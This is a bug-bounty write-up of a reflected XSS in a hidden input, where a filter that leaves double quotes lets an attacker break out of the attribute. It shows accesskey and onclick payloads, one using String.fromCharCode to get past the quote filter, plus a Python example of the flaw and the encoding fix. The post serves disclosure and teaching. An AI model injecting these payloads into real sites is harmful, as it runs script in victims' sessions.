…where you have the input sanitized for ‘<> chars.

I came across a web application on a bounty program where the returnurl parameter was placed in the following HTML:

[code language="html"]<input type="hidden" name="returnurl" value="[USER INJECT]" />[/code]

The security filter removed the <, > and ' characters but left the double quote untouched, so it was reflected as-is.
What’s the first thing that comes to mind?

[code language="html"]http://victim/?returnurl=" onclick="prompt(1)[/code]

Oh no! Wait… This is a hidden field, so most JavaScript events won't fire because the user can't see or interact with the input box, right?
You also can't style it to make the field visible.

What I did was quite simple. I remembered that Gareth Heyes wrote a small article on PortSwigger showing that you can use accesskey to get the XSS working: the victim presses a key on the keyboard and that fires a JavaScript event on the element. So my injection became:

[code language="html"]http://victim/?returnurl=" accesskey="X" onclick="alert(document.domain)[/code]

Which reflected:

[code language="html"]<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />[/code]

If the victim uses the accesskey X (usually ALT+SHIFT+X on Windows or CTRL+ALT+X on OSX), the domain is shown in the JavaScript alert box. Keep in mind that this works only in Firefox.

To give a better report, and also to show that their single-quote filter could be bypassed, I also sent the following XSS vector:

[code language="html"]http://victim/?returnurl=" accesskey="X" onclick="alert(String.fromCharCode(39,89,111,117,32,103,111,116,32,88,83,83,101,100,33,39))[/code]

It requires more user interaction but might give the bug appreciation program the Woooo! Factor 🙂
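The root cause here is a blacklist filter that strips `<`, `>` and `'` but not `"`, applied where the value lands inside a double-quoted attribute. The following is an added example (not code from the post or the affected application) that models that filter as a hypothetical `weak_filter`, renders the post's own reflected payload through it, and parses the result to show the extra `accesskey` and `onclick` attributes appearing. Beside it, `attr_encode` applies proper contextual output encoding with the standard library's `html.escape`, and the parse shows the whole payload ending up as inert text inside `value`. The template string and the attribute-collecting parser are assumptions of this example.

```python
import html
from html.parser import HTMLParser

# The reflection point described in the post: user input inside a double-quoted attribute.
TEMPLATE = '<input type="hidden" name="returnurl" value="{}" />'

# The post's own reflected payload, reused here as the test input.
PAYLOAD = '" accesskey="X" onclick="alert(document.domain)'


def weak_filter(value: str) -> str:
    """Hypothetical stand-in for the filter described in the post:
    strips <, > and ' but leaves the double quote untouched."""
    return value.replace("<", "").replace(">", "").replace("'", "")


def attr_encode(value: str) -> str:
    """Contextual output encoding for a double-quoted HTML attribute:
    &, <, >, " and ' all become character references."""
    return html.escape(value, quote=True)


class AttrCollector(HTMLParser):
    """Collects the attributes of the single tag fed to it.
    HTMLParser decodes character references in attribute values, so what we
    read back is what the browser would treat as the attribute's text."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        self.attrs = dict(attrs)

    def handle_startendtag(self, tag, attrs):
        self.attrs = dict(attrs)


def rendered_attributes(user_input: str, encoder) -> dict:
    """Render the template with the given encoder and return the parsed attributes."""
    parser = AttrCollector()
    parser.feed(TEMPLATE.format(encoder(user_input)))
    parser.close()
    return parser.attrs


def event_handlers(attrs: dict) -> list:
    """Attribute names that the browser treats as event handlers (on*)."""
    return sorted(name for name in attrs if name.startswith("on"))


if __name__ == "__main__":
    weak = rendered_attributes(PAYLOAD, weak_filter)
    print("weak filter  ->", weak, "handlers:", event_handlers(weak))
    safe = rendered_attributes(PAYLOAD, attr_encode)
    print("attr_encode  ->", safe, "handlers:", event_handlers(safe))
```

Running it shows the weak filter producing `accesskey` and `onclick` attributes on the input, while the encoded version yields only `type`, `name` and `value`, with `value` holding the full payload as data. The lesson for the fix is that a character blacklist is the wrong tool: encode for the context the value is written into, and the quote character of that context must always be among the encoded characters.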

3 Replies to “XSS on a input hidden field”
